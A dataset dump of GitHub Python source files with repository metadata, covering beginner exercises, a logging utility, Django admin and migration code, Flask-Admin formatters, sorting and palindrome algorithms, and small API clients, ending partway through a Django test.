blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
288
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 684
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 25
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 128
12.7k
| extension
stringclasses 142
values | content
stringlengths 128
8.19k
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
cdf830ae3e0835a12624bfd2c5ef4c83e633a614
|
313afbb1ea19f2266571870c7461f2591e30ea7b
|
/src/lab/lab01/z_7_macierze.py
|
e11a427c91a7ab0da9a9a38c400254c006be1ae9
|
[] |
no_license
|
tborzyszkowski/LogikaProgramowania
|
89201a76ddc60692ffccaf7c4c7b17d4e1e2c0e8
|
cceb161a6ff5933d2acc31f15879cafcf03b285b
|
refs/heads/master
| 2022-06-23T18:41:29.460094
| 2022-06-17T16:18:29
| 2022-06-17T16:18:29
| 250,095,485
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 527
|
py
|
from random import random
N = 2
m1 = [
[(1 if i == j else 0) for j in range(N)]
for i in range(N)
]
m2 = [[int(random() * 100) for y in range(N)] for x in range(N)]
print("m1:")
for row in m1:
print(row)
print("\n-----------\n")
print("m2:")
for row in m2:
print(row)
print("\n-----------\n")
wynik = [[0 for y in range(N)] for x in range(N)]
for i in range(N):
for j in range(N):
for k in range(N):
wynik[i][j] += m1[i][k] * m2[k][j]
for row in wynik:
print(row)
|
[
"t.borzyszkowski@gmail.com"
] |
t.borzyszkowski@gmail.com
|
2e80e028db2b748647fa57e8c02cd4029b2f9c93
|
27b3c7f8e144a3f6f4699e49d7df85c2918b3b23
|
/customlogger/custom_logger.py
|
a00a7935d53ac335c2646f71ecfd4cfe3e79646e
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
deresmos/customlogger
|
ddf0aabba7435816a5e160474e3545758cc078a4
|
6f6bbda8caeaa27a15d4981732ac7e57a525ea6f
|
refs/heads/master
| 2021-07-18T21:50:54.808304
| 2018-06-28T06:08:01
| 2018-06-28T06:08:01
| 98,201,131
| 1
| 1
|
MIT
| 2018-06-05T14:55:59
| 2017-07-24T14:40:55
|
Python
|
UTF-8
|
Python
| false
| false
| 5,725
|
py
|
# imports {{{1
import logging
import os
from os.path import expanduser
from colorlog import ColoredFormatter
from customlogger.only_filter import OnlyFilter
from customlogger.run_rotating_handler import RunRotatingHandler
# }}}
class CustomLogger:
# class variable {{{1
NOTSET = logging.NOTSET
DEBUG = logging.DEBUG
INFO = logging.INFO
WARNING = logging.WARNING
ERROR = logging.ERROR
CRITICAL = logging.CRITICAL
allLogFileName = 'all.log'
logDirPath = './log'
streamLevel = WARNING
fileLevel = DEBUG
isSaveLog = False
isColorLog = True
backupCount = 5
fileLogFmt = '%(asctime)s %(levelname)s %(filename)s %(name)s ' \
'%(lineno)s "%(message)s"'
streamLogFmt = '%(levelname)-8s %(message)s'
streamDebugLogFmt = '[%(levelname)s: File "%(filename)s", ' \
'line %(lineno)s, in %(funcName)s] "%(message)s"'
streamColorLogFmt = '%(log_color)s%(levelname)-8s%(reset)s %(message)s'
streamColorDebugLogFmt = '[%(log_color)s%(levelname)s%(reset)s: ' \
'File "%(filename)s", line %(lineno)s, in %(funcName)s] "%(message)s"'
dateFmt = '%Y-%m-%d %a %H:%M:%S'
logColors = {
'DEBUG': 'cyan',
'INFO': 'green',
'WARNING': 'yellow',
'ERROR': 'red',
'CRITICAL': 'red,bg_white',
}
# class methods {{{1
# debugMode {{{2
@classmethod
def debugMode(cls):
cls.streamLevel = CustomLogger.DEBUG
# property {{{1
@property
def logger(self):
if not self.__logger.handlers or self.__isFirstInitLogger:
self.setLogger()
return self.__logger
# private functions {{{1
def __init__( # {{{2
self, parent=None, logger_name=None, is_default=True):
name = parent or self
name = logger_name or type(name).__name__
logger = logging.getLogger(name)
self.__logger = logger
self.isDefault = is_default
self.__isFirstInitLogger = True
if self.__logger.handlers:
self.__isFirstInitLogger = False
@staticmethod # __createLogDir {{{2
def __createLogDir(path):
path = expanduser(path)
if os.path.isdir(path):
return
os.mkdir(path)
print('Create log directory. ({})'.format(os.path.abspath(path)))
# public functions {{{1
def setLogger(self): # {{{2
if self.isDefault:
self.defaultLoggerSetting()
def defaultLoggerSetting(self): # {{{2
self.__logger.setLevel(CustomLogger.DEBUG)
if self.isColorLog:
if self.streamLevel <= self.DEBUG:
fmt = self.streamColorDebugLogFmt
else:
fmt = self.streamColorLogFmt
self.addStreamColorHandler(self.streamLevel, fmt=fmt)
else:
if self.streamLevel <= self.DEBUG:
fmt = self.streamDebugLogFmt
else:
fmt = self.streamLogFmt
self.addStreamHandler(self.streamLevel, fmt=fmt)
self.addStreamHandler(
CustomLogger.INFO, is_only=True, check_level=True)
if self.isSaveLog:
self.__createLogDir(self.logDirPath)
self.addFileHandler(self.fileLevel)
self.addRunRotatingHandler(CustomLogger.DEBUG, self.backupCount)
def addHandler( # {{{2
self,
handler,
level,
fmt=None,
datefmt=None,
is_only=False,
formatter=None,
):
handler.setLevel(level)
datefmt = datefmt or self.dateFmt
formatter = formatter or logging.Formatter(fmt, datefmt)
handler.setFormatter(formatter)
# set only filter
if is_only:
handler.addFilter(OnlyFilter(level))
self.__logger.addHandler(handler)
def addStreamHandler( # {{{2
self, level, fmt=None, is_only=False, check_level=False):
if check_level and self.streamLevel <= level:
return
handler = logging.StreamHandler()
self.addHandler(handler, level, fmt=fmt, is_only=is_only)
def addStreamColorHandler( # {{{2
self, level, fmt=None, is_only=False, check_level=False):
if check_level and self.streamLevel <= level:
return
handler = logging.StreamHandler()
formatter = ColoredFormatter(
fmt,
log_colors=self.logColors,
style='%',
)
self.addHandler(handler, level, is_only=is_only, formatter=formatter)
def addFileHandler( # {{{2
self, level, out_path=None, fmt=None, is_only=False):
out_path = expanduser(
out_path or os.path.join(self.logDirPath, self.allLogFileName))
handler = logging.FileHandler(out_path)
fmt = fmt or self.fileLogFmt
self.addHandler(handler, level, fmt, is_only)
def addRotatingFileHandler( # {{{2
self,
level,
out_path,
max_bytes,
backup_count,
fmt=None,
is_only=False):
handler = logging.handlers.RotatingFileHandler(
filename=out_path, maxBytes=max_bytes, backupCount=backup_count)
fmt = fmt or self.fileLogFmt
self.addHandler(handler, level, fmt, is_only)
def addRunRotatingHandler( # {{{2
self,
level,
backup_count,
out_path=None,
fmt=None,
is_only=False):
out_path = expanduser(out_path or self.logDirPath)
handler = RunRotatingHandler(out_path, backup_count)
fmt = fmt or self.fileLogFmt
self.addHandler(handler, level, fmt, is_only)
# }}}1
|
[
"deresmos@gmail.com"
] |
deresmos@gmail.com
|
809595d1fa3df5a45abcab47ef7dd4d58698b915
|
8af8544612d10260d1eaf4c613e599aaafc8f4c7
|
/cal/admin.py
|
48bd114c5a689fcc66e2fa9e1edc167617f235d1
|
[] |
no_license
|
Noeuclides/djangocalendar
|
46979e7249adc94c449b7bd54888f752936a9a46
|
4a7fed9ae73989190c8b1f620de81af48248b788
|
refs/heads/master
| 2023-07-31T21:42:25.638017
| 2020-06-22T22:32:15
| 2020-06-22T22:32:15
| 273,511,608
| 0
| 0
| null | 2021-09-22T19:16:05
| 2020-06-19T14:20:39
|
Python
|
UTF-8
|
Python
| false
| false
| 1,114
|
py
|
from django.contrib import admin
from cal.models import *
class EventAdmin(admin.ModelAdmin):
list_display = ('id', 'title', 'grade')
list_display_links = ('id', 'title', 'grade')
class ChallengeAdmin(admin.ModelAdmin):
list_display = ('id', 'name', 'grade')
list_display_links = ('id', 'name', 'grade')
class GradeAdmin(admin.ModelAdmin):
list_display = ('id', 'name')
list_display_links = ('id', 'name')
class ActivityAdmin(admin.ModelAdmin):
list_display = ('id', 'name', 'event')
list_display_links = ('id', 'name', 'event')
class WorkTeamAdmin(admin.ModelAdmin):
list_display = ('id', 'challenge')
list_display_links = ('id', 'challenge')
class WA_Admin(admin.ModelAdmin):
list_display = ('id', 'workteam', 'activity', 'state')
list_display_links = ('id', 'workteam', 'activity', 'state')
admin.site.register(Event, EventAdmin)
admin.site.register(Challenge, ChallengeAdmin)
admin.site.register(Grade, GradeAdmin)
admin.site.register(Activity, ActivityAdmin)
admin.site.register(WorkTeam, WorkTeamAdmin)
admin.site.register(workteam_activity, WA_Admin)
|
[
"euclidesnoeuclides@gmail.com"
] |
euclidesnoeuclides@gmail.com
|
0a45a862d3c529f57cce59103290f55dc8ab44f8
|
057fde8a8ab9622a3524cb880c7ace5a15c0f355
|
/set7/70.py
|
4b1fb8e3c9d5e4a6348aeeaf197facb1e7fb3b10
|
[] |
no_license
|
ramyasutraye/Guvi_Python
|
e9ba6eb812ec8014214dce77d710ce230bbb8020
|
2fed3c460185fbf7bcf64c068084bcdb7d840140
|
refs/heads/master
| 2020-04-23T19:30:21.003061
| 2018-05-25T10:43:14
| 2018-05-25T10:43:14
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 157
|
py
|
a=int(input("Enter any number:"))
for i in range(0,a):
num=2**i
if num>a:
print(num)
break
if a==2:
print("4")
elif a==1 or a==0:
print("2")
|
[
"noreply@github.com"
] |
ramyasutraye.noreply@github.com
|
4fd5d0b3cf69ec3401158708578acd35b429b996
|
242f1dafae18d3c597b51067e2a8622c600d6df2
|
/src/0000-0099/0005.manacher.py
|
fb347e485f03f4f36cd8545c32505243e8a5b10e
|
[] |
no_license
|
gyang274/leetcode
|
a873adaa083270eb05ddcdd3db225025533e0dfe
|
6043134736452a6f4704b62857d0aed2e9571164
|
refs/heads/master
| 2021-08-07T15:15:01.885679
| 2020-12-22T20:57:19
| 2020-12-22T20:57:19
| 233,179,192
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,377
|
py
|
class Solution:
def longestPalindrome(self, s: str) -> str:
"""Manacher Algorithm.
"""
n = 2 * len(s) + 1
# augmented s with #
ss = lambda s, i: s[(i - 1) // 2] if i % 2 else '#'
# c: center of palindrome with rightmost position
c = 0
# r: right of palindrom with rightmost position
r = 0
# i: current position under investigation, c <= i <= r
i = 0
# j: relfect of i w.r.t c
# j = lambda i, c: 2 * c - i
# p: length of palindrome at each position, e.g., r - c at c
p = [0 for _ in range(n)]
# loop through i w.r.t manacher algorithm
mi = -1
ml = -1
for i in range(n):
if (r < i):
c, r = i, i
# 2 * c - i - p[2 * c - i] == 2 * c - r
if p[2 * c - i] == r - i:
while 2 * i - r >= 0 and r < n and ss(s, 2 * i - r) == ss(s, r):
r += 1
r -= 1
c = i
p[i] = r - i
else:
p[i] = min(p[2 * c - i], r - i)
if p[i] > ml:
mi = i
ml = p[i]
# print(i, c, r, [ss(s, i) + ':' + str(p[i]) for i in range(n)])
return s[((mi - ml) // 2):((mi + ml) // 2)]
if __name__ == '__main__':
solver = Solution()
cases = [
"aba",
"aabba",
"aababa",
"aabbaa",
]
rslts = [solver.longestPalindrome(s) for s in cases]
for cs, rs in zip(cases, rslts):
print(f"case: {cs} | solution: {rs}")
|
[
"gyang274@gmail.com"
] |
gyang274@gmail.com
|
bc576f8ef94ce910cccb8942737b54d6b3bf8daa
|
c071eb46184635818e8349ce9c2a78d6c6e460fc
|
/system/python_stubs/1336907795/Scripts/_testbuffer.py
|
706a5b806e0bdf4a96417ae23fce495550448982
|
[] |
no_license
|
sidbmw/PyCharm-Settings
|
a71bc594c83829a1522e215155686381b8ac5c6e
|
083f9fe945ee5358346e5d86b17130d521d1b954
|
refs/heads/master
| 2020-04-05T14:24:03.216082
| 2018-12-28T02:29:29
| 2018-12-28T02:29:29
| 156,927,399
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,549
|
py
|
# encoding: utf-8
# module Scripts._testbuffer
# from C:\Users\siddh\PycharmProjects\Introduction to Python\.idea\VirtualEnvironment\Scripts\_testbuffer.pyd
# by generator 1.145
# no doc
# no imports
# Variables with simple values
ND_FORTRAN = 4
ND_GETBUF_FAIL = 64
ND_GETBUF_UNDEFINED = 128
ND_MAX_NDIM = 128
ND_PIL = 16
ND_REDIRECT = 32
ND_SCALAR = 8
ND_VAREXPORT = 1
ND_WRITABLE = 2
PyBUF_ANY_CONTIGUOUS = 152
PyBUF_CONTIG = 9
PyBUF_CONTIG_RO = 8
PyBUF_C_CONTIGUOUS = 56
PyBUF_FORMAT = 4
PyBUF_FULL = 285
PyBUF_FULL_RO = 284
PyBUF_F_CONTIGUOUS = 88
PyBUF_INDIRECT = 280
PyBUF_ND = 8
PyBUF_READ = 256
PyBUF_RECORDS = 29
PyBUF_RECORDS_RO = 28
PyBUF_SIMPLE = 0
PyBUF_STRIDED = 25
PyBUF_STRIDED_RO = 24
PyBUF_STRIDES = 24
PyBUF_WRITABLE = 1
PyBUF_WRITE = 512
# functions
def cmp_contig(*args, **kwargs): # real signature unknown
pass
def get_contiguous(*args, **kwargs): # real signature unknown
pass
def get_pointer(*args, **kwargs): # real signature unknown
pass
def get_sizeof_void_p(*args, **kwargs): # real signature unknown
pass
def is_contiguous(*args, **kwargs): # real signature unknown
pass
def py_buffer_to_contiguous(*args, **kwargs): # real signature unknown
pass
def slice_indices(*args, **kwargs): # real signature unknown
pass
# classes
class ndarray(object):
# no doc
def add_suboffsets(self, *args, **kwargs): # real signature unknown
pass
def memoryview_from_buffer(self, *args, **kwargs): # real signature unknown
pass
def pop(self, *args, **kwargs): # real signature unknown
pass
def push(self, *args, **kwargs): # real signature unknown
pass
def tobytes(self, *args, **kwargs): # real signature unknown
pass
def tolist(self, *args, **kwargs): # real signature unknown
pass
def __delitem__(self, *args, **kwargs): # real signature unknown
""" Delete self[key]. """
pass
def __getattribute__(self, *args, **kwargs): # real signature unknown
""" Return getattr(self, name). """
pass
def __getitem__(self, *args, **kwargs): # real signature unknown
""" Return self[key]. """
pass
def __hash__(self, *args, **kwargs): # real signature unknown
""" Return hash(self). """
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(*args, **kwargs): # real signature unknown
""" Create and return a new object. See help(type) for accurate signature. """
pass
def __setitem__(self, *args, **kwargs): # real signature unknown
""" Set self[key] to value. """
pass
contiguous = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
c_contiguous = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
flags = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
format = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
f_contiguous = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
itemsize = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
nbytes = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
ndim = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
obj = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
offset = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
readonly = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
shape = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
strides = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
suboffsets = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
class staticarray(object):
# no doc
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(*args, **kwargs): # real signature unknown
""" Create and return a new object. See help(type) for accurate signature. """
pass
# variables with complex values
__loader__ = None # (!) real value is ''
__spec__ = None # (!) real value is ''
|
[
"siddharthnatamai@gmail.com"
] |
siddharthnatamai@gmail.com
|
e7567675022bdbdfd9b443dd0209766b03578342
|
9f2ea36883c5fbd2b96132917e4939d5f99de400
|
/flask_mongo_profiler/contrib/flask_admin/formatters/lookup.py
|
c500c2d56a60f9c56a9b70753024b9727317fc00
|
[
"MIT"
] |
permissive
|
eduflow/flask-mongo-profiler
|
80803111e1c4e5a817401d1339571c8475c9b84c
|
a267eeb49fea07c9a24fb370bd9d7a90ed313ccf
|
refs/heads/master
| 2023-05-27T01:58:24.860787
| 2018-12-15T21:16:57
| 2018-12-15T21:18:54
| 154,967,856
| 0
| 0
|
MIT
| 2023-05-22T21:35:44
| 2018-10-27T13:31:26
|
Python
|
UTF-8
|
Python
| false
| false
| 1,265
|
py
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
from flask import Markup
from ..helpers import get_list_url_filtered_by_field_value
def search_field_formatter(view, context, model, name):
filter_url = get_list_url_filtered_by_field_value(view, model, name)
filter_applied = False
if filter_url is None: # currently filtered
filter_url = get_list_url_filtered_by_field_value(
view, model, name, reverse=True
)
filter_applied = True
return Markup(
''.join(
[
model[name],
' ',
'<a href="{href}" class="{classname}" data-role="tooltip"'.format(
href=filter_url,
classname='fa fa-{icon} glyphicon glyphicon-{icon}'.format(
icon='search' if not filter_applied else 'remove'
),
),
'title data-original-title="{}"'.format(
'Filter {} by {}'.format(name, model[name])
if not filter_applied
else 'Clear filter'
),
'style="text-decoration:none"',
'></a>',
]
)
)
|
[
"tony@git-pull.com"
] |
tony@git-pull.com
|
4e4334450f22bbbdb6cbd28d91bea30372bf64eb
|
8fa938eddcc75eb7dff1f2055c49cb3817a00c63
|
/String/ex49.py
|
60dfa2055e3999b694cd7c97f3c9dca529ba9fc5
|
[] |
no_license
|
jayhebe/w3resource_exercises
|
f27109759d112b0611574aa70eb378ace447c2a0
|
b29aa7c806f6021a8988e83bb9f674522a41380d
|
refs/heads/master
| 2020-05-07T09:23:24.039271
| 2020-01-30T15:05:06
| 2020-01-30T15:05:06
| 180,374,062
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 148
|
py
|
def get_vowels(char_str):
return [ch for ch in char_str if ch in "aeiouAEIOU"]
if __name__ == '__main__':
print(get_vowels("w3resource"))
|
[
"jayhebe1983@sina.com"
] |
jayhebe1983@sina.com
|
d6285ad479fd73931af9354c270848582cab80b4
|
d3b829dc03641fba2a57c816891a021ab7d5b505
|
/fluent_contents/migrations/0001_initial.py
|
d713326b77ede1588edb67715503f41e8d68659b
|
[
"Apache-2.0"
] |
permissive
|
django-fluent/django-fluent-contents
|
7af8c0782f1e99832cae6c4f1ed3d99e72097199
|
5577567303d29b56fd48128c22c7dc5d8b2c7476
|
refs/heads/master
| 2023-02-21T01:44:34.935089
| 2021-11-17T08:55:16
| 2021-11-17T08:58:26
| 3,145,163
| 84
| 18
|
Apache-2.0
| 2023-02-15T20:50:09
| 2012-01-10T12:54:57
|
Python
|
UTF-8
|
Python
| false
| false
| 4,207
|
py
|
import django.db.models.deletion
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [("contenttypes", "0001_initial")]
operations = [
migrations.CreateModel(
name="ContentItem",
fields=[
(
"id",
models.AutoField(
verbose_name="ID",
serialize=False,
auto_created=True,
primary_key=True,
),
),
("parent_id", models.IntegerField(null=True)),
(
"language_code",
models.CharField(default="", max_length=15, editable=False, db_index=True),
),
("sort_order", models.IntegerField(default=1, db_index=True)),
(
"parent_type",
models.ForeignKey(to="contenttypes.ContentType", on_delete=models.CASCADE),
),
],
options={
"ordering": ("placeholder", "sort_order"),
"verbose_name": "Contentitem link",
"verbose_name_plural": "Contentitem links",
},
bases=(models.Model,),
),
migrations.CreateModel(
name="Placeholder",
fields=[
(
"id",
models.AutoField(
verbose_name="ID",
serialize=False,
auto_created=True,
primary_key=True,
),
),
(
"slot",
models.SlugField(
help_text="A short name to identify the placeholder in the template code.",
verbose_name="Slot",
),
),
(
"role",
models.CharField(
default="m",
help_text="This defines where the object is used.",
max_length=1,
verbose_name="Role",
choices=[
("m", "Main content"),
("s", "Sidebar content"),
("r", "Related content"),
],
),
),
("parent_id", models.IntegerField(null=True)),
(
"title",
models.CharField(max_length=255, verbose_name="Admin title", blank=True),
),
(
"parent_type",
models.ForeignKey(
blank=True,
to="contenttypes.ContentType",
null=True,
on_delete=models.CASCADE,
),
),
],
options={
"verbose_name": "Placeholder",
"verbose_name_plural": "Placeholders",
},
bases=(models.Model,),
),
migrations.AlterUniqueTogether(
name="placeholder",
unique_together={("parent_type", "parent_id", "slot")},
),
migrations.AddField(
model_name="contentitem",
name="placeholder",
field=models.ForeignKey(
related_name="contentitems",
on_delete=django.db.models.deletion.SET_NULL,
to="fluent_contents.Placeholder",
null=True,
),
preserve_default=True,
),
migrations.AddField(
model_name="contentitem",
name="polymorphic_ctype",
field=models.ForeignKey(
related_name="polymorphic_fluent_contents.contentitem_set+",
editable=False,
to="contenttypes.ContentType",
on_delete=models.CASCADE,
null=True,
),
preserve_default=True,
),
]
|
[
"vdboor@edoburu.nl"
] |
vdboor@edoburu.nl
|
2f6e18a5f4ba8b0456377676821bca0328fe208c
|
8311a0bcf3f2126d622f928483ce2ea9d6a7cb0d
|
/Code/Matthew/python/bogosort.py
|
8a5e8b1541f2a5351db02b7bfa5859e5544947c6
|
[] |
no_license
|
guam68/class_iguana
|
857247dca0ff732d11f7fb0d3dc761ec83846c94
|
e4359d32dfe60423a643c21df5636669016ad2c0
|
refs/heads/master
| 2020-05-01T06:33:22.611127
| 2019-03-13T23:07:41
| 2019-03-13T23:07:41
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,570
|
py
|
# import random
# def bubble_sort(nums):
# for i in range(len(nums)):
# for j in range(len(nums)-1):
# if nums[j] > nums[j+1]:
# nums[j], nums[j+1] = nums[j+1], nums[j]
#
# nums = [random.randint(0,99) for i in range(100)]
# print(nums)
# bubble_sort(nums)
# print(nums)
import random
import time
def random_list(n):
nums = []
for i in range(n):
nums.append(random.randint(0, 99))
return nums
def shuffle_nums(nums):
for i in range(len(nums)):
j = random.randint(0, len(nums)-1)
nums[i], nums[j] = nums[j], nums[i]
def is_sorted(nums):
for i in range(len(nums)-1):
if nums[i] > nums[i+1]:
return False
return True
def percent_sorted(nums):
count = 0
for i in range(len(nums)-1):
if nums[i] <= nums[i+1]:
count += 1
return count/(len(nums)-1)
def get_time():
return int(round(time.time() * 1000))
def bogosort(nums):
counter = 0
start_time = get_time()
while not is_sorted(nums):
shuffle_nums(nums)
counter += 1
end_time = get_time()
time_taken = end_time - start_time
# print(f'total time taken: {time_taken/1000} seconds')
# print(f'time per step: {time_taken/1000/counter} second')
print(f'bogosort: {counter}')
def bogosort_optimized(nums):
ps = percent_sorted(nums)
counter = 0
# while abs(ps-1.0) > 0.00001:
while ps != 1.0:
counter += 1
nums_temp = nums.copy()
shuffle_nums(nums_temp)
pst = percent_sorted(nums_temp)
if pst > ps:
nums = nums_temp
ps = pst
print(f'bogosort_optimized: {counter}')
return nums
def sqrt_optimized(x):
z = 0
counter = 0
while z*z != x:
z = int(random.random()*x)
counter += 1
print(f'sqrt_optimized: {counter}')
return z
print(sqrt_optimized(64))
seed = get_time()
n_values = 8
print(f'seed: {seed}')
print()
random.seed(seed)
nums = random_list(n_values)
print(nums)
bogosort(nums)
print(nums)
random.seed(seed)
nums = random_list(n_values)
print(nums)
nums = bogosort_optimized(nums)
print(nums)
# nums = random_list(5)
# print(nums)
# input('...')
# bogosort(nums)
# print(nums)
# def get_time():
# return int(round(time.time() * 1000))
# nums = random_list(12)
# print(nums)
# input('>')
# bogosort(nums)
# print(nums)
# nums = [1, 2, 3, 4]
# print(nums)
# print(is_sorted(nums))
# shuffle_nums(nums)
# print(nums)
# print(is_sorted(nums))
|
[
"flux2341@gmail.com"
] |
flux2341@gmail.com
|
8f425fd16f7d5aded1fbfb08578f898f5cecf18f
|
5da5473ff3026165a47f98744bac82903cf008e0
|
/packages/google-cloud-alloydb/samples/generated_samples/alloydb_v1beta_generated_alloy_db_admin_generate_client_certificate_async.py
|
f1d54b369e792a9e23c7159b0cbbd6d2a0c78430
|
[
"Apache-2.0"
] |
permissive
|
googleapis/google-cloud-python
|
ed61a5f03a476ab6053870f4da7bc5534e25558b
|
93c4e63408c65129422f65217325f4e7d41f7edf
|
refs/heads/main
| 2023-09-04T09:09:07.852632
| 2023-08-31T22:49:26
| 2023-08-31T22:49:26
| 16,316,451
| 2,792
| 917
|
Apache-2.0
| 2023-09-14T21:45:18
| 2014-01-28T15:51:47
|
Python
|
UTF-8
|
Python
| false
| false
| 1,940
|
py
|
# -*- coding: utf-8 -*-
# Copyright 2023 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Generated code. DO NOT EDIT!
#
# Snippet for GenerateClientCertificate
# NOTE: This snippet has been automatically generated for illustrative purposes only.
# It may require modifications to work in your environment.
# To install the latest published package dependency, execute the following:
# python3 -m pip install google-cloud-alloydb
# [START alloydb_v1beta_generated_AlloyDBAdmin_GenerateClientCertificate_async]
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import alloydb_v1beta
async def sample_generate_client_certificate():
# Create a client
client = alloydb_v1beta.AlloyDBAdminAsyncClient()
# Initialize request argument(s)
request = alloydb_v1beta.GenerateClientCertificateRequest(
parent="parent_value",
)
# Make the request
response = await client.generate_client_certificate(request=request)
# Handle the response
print(response)
# [END alloydb_v1beta_generated_AlloyDBAdmin_GenerateClientCertificate_async]
|
[
"noreply@github.com"
] |
googleapis.noreply@github.com
|
5f7225a8bb8465174507e5765718f14c91635f9b
|
2d9a3ce2a04190d0032e8a298829022260b1d76b
|
/indra/databases/biolookup_client.py
|
a8ac55265ff756883e26106fd0c97136b94d074f
|
[
"BSD-2-Clause",
"BSD-2-Clause-Views"
] |
permissive
|
sorgerlab/indra
|
f127a0f9bdd2d3f48df14575883fd31e2f4de4bf
|
6d6ca1174792b6c5a05cbf3afcb9f138fabcec6a
|
refs/heads/master
| 2023-08-21T13:25:54.654995
| 2023-06-11T16:46:41
| 2023-06-11T16:46:41
| 22,848,436
| 158
| 61
|
BSD-2-Clause
| 2023-08-30T21:47:59
| 2014-08-11T17:44:05
|
Python
|
UTF-8
|
Python
| false
| false
| 1,316
|
py
|
"""A client to the Biolookup web service available at http://biolookup.io/."""
from typing import Dict
import requests
URL = 'http://biolookup.io/api/lookup/'
def lookup_curie(curie: str) -> Dict:
"""Look up a CURIE in the Biolookup web service.
Parameters
----------
curie :
The CURIE to look up.
Returns
-------
:
A dictionary containing the results of the lookup.
"""
url = URL + curie
response = requests.get(url)
response.raise_for_status()
return response.json()
def lookup(db_ns: str, db_id: str) -> dict:
"""Look up a namespace and corresponding ID in the Biolookup web service.
Parameters
----------
db_ns :
The database namespace.
db_id :
The database ID.
Returns
-------
:
A dictionary containing the results of the lookup.
"""
curie = db_ns + ':' + db_id
return lookup_curie(curie)
def get_name(db_ns: str, db_id: str) -> Dict:
"""Return the name of a namespace and corresponding ID in the Biolookup web
service.
Parameters
----------
db_ns :
The database namespace.
db_id :
The database ID.
Returns
-------
:
The name of the entry.
"""
res = lookup(db_ns, db_id)
return res.get('name')
|
[
"ben.gyori@gmail.com"
] |
ben.gyori@gmail.com
|
0797c311f47d452f7d067ce093d1a6ac6666d7b9
|
d178ecd2d3511fcd98aca731ada1aa0fec0e15a1
|
/prog_count/grader.py
|
dca9b796081c90aeae9a3b3000b81e8f76932a68
|
[] |
no_license
|
0xBADCA7/easyctf-iv-problems
|
165cca68e2bad788604dab4b15c644e994c7fa85
|
7037fe557df97cd85b3eada672ef44a356236522
|
refs/heads/master
| 2020-08-13T21:16:26.114580
| 2018-02-21T06:15:40
| 2018-02-21T06:15:40
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 239
|
py
|
from itertools import combinations as comb
n, s = map(int, input().split())
nums = [int(u) for u in input().split()]
t = 0
for i in range(1, len(nums) + 1):
for c in comb(nums, i):
if sum(c) == s:
t += 1
print(t)
|
[
"failed.down@gmail.com"
] |
failed.down@gmail.com
|
19d84cb48523b1f33dfbbc80555e822ae0d9177b
|
9cfdfe633dfb2755955f9d356fdd0a9601089955
|
/account_auth/tests/test_veiws.py
|
cc19cd637b9384f9d338cf62d7f16a79d4b53583
|
[] |
no_license
|
DimAntDim/ResumeBuilder
|
cec597ba4b857d98147e2f5f6831bd3c93c83c80
|
0507d5d9c44936d892df280015f7c6d8e630f55b
|
refs/heads/main
| 2023-08-21T08:03:43.327868
| 2021-11-03T19:43:04
| 2021-11-03T19:43:04
| 394,882,643
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,701
|
py
|
from account_auth.forms import RegisterForm
from django.contrib.auth import get_user_model
from django.test import TestCase
from django.urls import reverse
UserModel = get_user_model()
class RegisterViewTest(TestCase):
def test_register_render_template(self):
response = self.client.get(reverse('register'))
